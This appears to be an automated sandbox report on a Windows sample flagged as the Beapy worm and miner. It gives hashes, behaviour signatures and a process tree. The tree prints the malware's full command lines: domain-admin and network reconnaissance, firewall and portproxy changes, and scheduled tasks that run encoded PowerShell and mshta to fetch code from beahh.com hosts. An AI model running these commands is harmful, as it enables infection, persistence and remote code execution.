Overview

overview

10

Static

static

3

02fb6ada0f...14.exe

windows7_x64

10

02fb6ada0f...14.exe

windows10_x64

9

Analysis

  • max time kernel
    152s
  • max time network
    153s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    18-05-2021 08:00

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    02fb6ada0fac1dfa52d1a16873c6b2e815cbf4ae75b62371d238a71f3d7a3d14.exe

  • Size

    6.6MB

  • MD5

    2b1e39fc33f9264f8401f6b59bb0857f

  • SHA1

    2553c5666fa5cc37dfc68f35dadc5f026d22bc6b

  • SHA256

    02fb6ada0fac1dfa52d1a16873c6b2e815cbf4ae75b62371d238a71f3d7a3d14

  • SHA512

    1750fd743d8a132f6769b418789be6f84b26e9f4b13569d1afa48660ee64885f7bf8b95bb14d87c892e1b39a8bfe8bde7bd0d8ad6eeaefd00bb1a82a3fce17fa

Score
10/10
beapyevasionminerworm

Malware Config

Signatures

  • Beapy

    Beapy is a python worm with crypto mining capabilities.

    minerwormbeapy
  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Modifies Windows Firewall 1 TTPs
    evasion
  • Loads dropped DLL 20 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Gathers network information 2 TTPs 3 IoCs

    Uses commandline utility to view network configuration.

  • Modifies data under HKEY_USERS 32 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 42 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\02fb6ada0fac1dfa52d1a16873c6b2e815cbf4ae75b62371d238a71f3d7a3d14.exe
    "C:\Users\Admin\AppData\Local\Temp\02fb6ada0fac1dfa52d1a16873c6b2e815cbf4ae75b62371d238a71f3d7a3d14.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1360
    • C:\Users\Admin\AppData\Local\Temp\02fb6ada0fac1dfa52d1a16873c6b2e815cbf4ae75b62371d238a71f3d7a3d14.exe
      "C:\Users\Admin\AppData\Local\Temp\02fb6ada0fac1dfa52d1a16873c6b2e815cbf4ae75b62371d238a71f3d7a3d14.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:1416
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c wmic ntdomain get domainname
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:796
        • C:\Windows\SysWOW64\Wbem\WMIC.exe
          wmic ntdomain get domainname
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1192
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c net localgroup administrators
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:820
        • C:\Windows\SysWOW64\net.exe
          net localgroup administrators
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:656
          • C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 localgroup administrators
            5⤵
              PID:1892
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c net group "domain admins" /domain
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1112
          • C:\Windows\SysWOW64\net.exe
            net group "domain admins" /domain
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:824
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 group "domain admins" /domain
              5⤵
                PID:1156
          • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\SysNative\WindowsPowerShell\v1.0\powershell.exe -exec bypass "import-module C:\Users\Admin\AppData\Local\Temp\m2.ps1"
            3⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1672
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c ipconfig /all
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1308
            • C:\Windows\SysWOW64\ipconfig.exe
              ipconfig /all
              4⤵
              • Gathers network information
              PID:512
          • C:\Windows\SysWOW64\ipconfig.exe
            ipconfig /all
            3⤵
            • Gathers network information
            PID:308
          • C:\Windows\SysWOW64\netstat.exe
            netstat -na
            3⤵
            • Gathers network information
            • Suspicious use of AdjustPrivilegeToken
            PID:1380
      • C:\Windows\WrsgoFoe.exe
        C:\Windows\WrsgoFoe.exe
        1⤵
        • Suspicious use of WriteProcessMemory
        PID:1880
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c call "c:\windows\temp\tmp.vbs"
          2⤵
          • Modifies data under HKEY_USERS
          • Suspicious use of WriteProcessMemory
          PID:688
          • C:\Windows\SysWOW64\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\windows\temp\tmp.vbs"
            3⤵
            • Modifies data under HKEY_USERS
            PID:1836
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /c echo uDvs >> c:\windows\temp\svchost.exe&echo "*" >c:\windows\temp\ipc.txt&netsh firewall add portopening tcp 65533 DNSd&netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53&copy /y c:\windows\temp\svchost.exe c:\windows\IOLIyDqS.exe&move /y c:\windows\temp\dig.exe c:\windows\alMTmPEA.exe&if exist C:/windows/system32/WindowsPowerShell/ (schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn IOLIyDqS /tr "C:\Windows\IOLIyDqS.exe" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\OgPCbvuh" /tr "c:\windows\alMTmPEA.exe" /F) else (start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autocheck /f&schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr "cmd.exe /c mshta http://w.beahh.com/page.html?pMRBKYMNO"&schtasks /run /TN Autocheck&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autostart /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN Autostart /tr "c:\windows\alMTmPEA.exe"&schtasks /run /TN Autostart&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN escan /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN escan /tr "c:\windows\IOLIyDqS.exe"&schtasks /run /TN escan)
              4⤵
              • Drops file in Windows directory
              PID:828
              • C:\Windows\SysWOW64\netsh.exe
                netsh firewall add portopening tcp 65533 DNSd
                5⤵
                • Modifies data under HKEY_USERS
                PID:1084
              • C:\Windows\SysWOW64\netsh.exe
                netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53
                5⤵
                • Modifies data under HKEY_USERS
                PID:2144
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F
                5⤵
                • Creates scheduled task(s)
                PID:1976
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn IOLIyDqS /tr "C:\Windows\IOLIyDqS.exe" /F
                5⤵
                • Creates scheduled task(s)
                PID:796
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\OgPCbvuh" /tr "c:\windows\alMTmPEA.exe" /F
                5⤵
                • Creates scheduled task(s)
                PID:1308
      • C:\Windows\MuzZLUPM.exe
        C:\Windows\MuzZLUPM.exe
        1⤵
          PID:1340

        Network

        MITRE ATT&CK Enterprise v6

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • memory/1416-86-0x0000000000820000-0x000000000089C000-memory.dmp

          Filesize

          496KB

          Download

        • memory/1416-103-0x0000000000190000-0x00000000001A0000-memory.dmp

          Filesize

          64KB

          Download

        • memory/1416-106-0x00000000001B0000-0x00000000001C5000-memory.dmp

          Filesize

          84KB

          Download

        • memory/1416-77-0x0000000000760000-0x0000000000815000-memory.dmp

          Filesize

          724KB

          Download

        • memory/1416-94-0x0000000000150000-0x0000000000160000-memory.dmp

          Filesize

          64KB

          Download

        • memory/1416-64-0x00000000752B1000-0x00000000752B3000-memory.dmp

          Filesize

          8KB

          Download

        • memory/1672-126-0x0000000034700000-0x0000000034701000-memory.dmp

          Filesize

          4KB

          Download

        • memory/1672-119-0x00000000024B0000-0x00000000024B1000-memory.dmp

          Filesize

          4KB

          Download

        • memory/1672-124-0x000000001B830000-0x000000001B831000-memory.dmp

          Filesize

          4KB

          Download

        • memory/1672-122-0x000000001AC94000-0x000000001AC96000-memory.dmp

          Filesize

          8KB

          Download

        • memory/1672-121-0x000000001AC90000-0x000000001AC92000-memory.dmp

          Filesize

          8KB

          Download

        • memory/1672-120-0x0000000002560000-0x0000000002561000-memory.dmp

          Filesize

          4KB

          Download

        • memory/1672-125-0x000000001AC9A000-0x000000001ACB9000-memory.dmp

          Filesize

          124KB

          Download

        • memory/1672-116-0x000007FEFB591000-0x000007FEFB593000-memory.dmp

          Filesize

          8KB

          Download

        • memory/1672-118-0x000000001AD10000-0x000000001AD11000-memory.dmp

          Filesize

          4KB

          Download

        • memory/1672-117-0x0000000001F90000-0x0000000001F91000-memory.dmp

          Filesize

          4KB

          Download